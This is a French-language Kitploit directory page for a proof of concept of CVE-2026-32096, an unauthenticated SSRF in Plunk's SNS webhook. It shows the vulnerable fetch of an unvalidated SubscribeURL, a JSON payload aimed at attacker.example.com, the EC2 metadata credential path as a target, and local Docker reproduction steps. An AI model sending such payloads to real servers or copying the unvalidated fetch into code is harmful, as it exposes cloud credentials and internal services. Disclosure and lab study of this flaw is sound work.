Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-32096 — Preuve de concept d'exploitation pour une vulnérabilité SSRF dans le webhook SNS de Plunk, démontrant une falsification de requête côté serveur non authentifiée via un SubscribeURL non validé. | Kitploit
Outils/GitHubGitHub/andrebhu/cve-2026-32096
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubandrebhu/cve-2026-32096

CVE-2026-32096

Preuve de concept d'exploitation pour une vulnérabilité SSRF dans le webhook SNS de Plunk, démontrant une falsification de requête côté serveur non authentifiée via un SubscribeURL non validé.

Voir le dépôt
il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-32096

SSRF via confirmation d'abonnement SNS AWS non validée dans useplunk/plunk

Résumé

Le point de terminaison API Plunk POST /webhooks/sns récupère un SubscribeURL fourni par l'attaquant sans vérifier la signature cryptographique AWS SNS. Un attaquant non authentifié peut forcer le serveur à effectuer des requêtes HTTP sortantes arbitraires (SSRF).

SévéritéCritique — CVSS 9.3 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N)
CWECWE-918 : Server-Side Request Forgery
Fichier concernéapps/api/src/controllers/Webhooks.ts
Authentification requiseAucune

Code vulnérable

root@kitploit:~
// apps/api/src/controllers/Webhooks.ts
if (req.body.Type === 'SubscriptionConfirmation') {
  const confirmResponse = await fetch(req.body.SubscribeURL); // SSRF — aucune validation de signature
  if (confirmResponse.ok) {
    return res.status(200).json({ success: true, message: 'Subscription confirmed' });
  }
}

La charge utile minimale ne comporte que deux champs :

root@kitploit:~
{
  "Type": "SubscriptionConfirmation",
  "SubscribeURL": "http://attacker.example.com/callback"
}

Impact

  • AWS EC2/ECS : Voler les identifiants IAM via http://169.254.169.254/latest/meta-data/iam/security-credentials/
  • Services internes : Atteindre les bases de données, Redis, l'API Kubernetes ou d'autres services non exposés à Internet
  • Scan de ports : Énumérer les ports internes via des réponses basées sur le temps et les erreurs

Reproduction

Prérequis

  • Docker et Docker Compose
  • Python 3

Étapes

  1. Démarrer l'environnement de test Plunk :

    root@kitploit:~
    docker compose up -d
    
  2. Démarrer le listener de rappel SSRF :

    root@kitploit:~
    python3 listener.py
    
  3. Exécuter l'exploit :

    root@kitploit:~
    chmod +x exploit.sh
    ./exploit.sh
    
  4. Observer le rappel dans la sortie de listener.py, confirmant que le serveur a récupéré l'URL contrôlée par l'attaquant.

Fichiers

FichierDescription
exploit.shScript d'exploit de bout en bout — envoie une charge utile SNS falsifiée au point de terminaison vulnérable
listener.pyListener de rappel SSRF — capture et journalise les requêtes entrantes provenant du serveur Plunk
docker-compose.ymlEnvironnement Docker Compose minimal (Postgres, Redis, Plunk) pour la reproduction locale

Références

  • AWS SNS : Vérification des signatures des messages Amazon SNS
  • Aide-mémoire OWASP sur la prévention des SSRF
Télécharger l’outil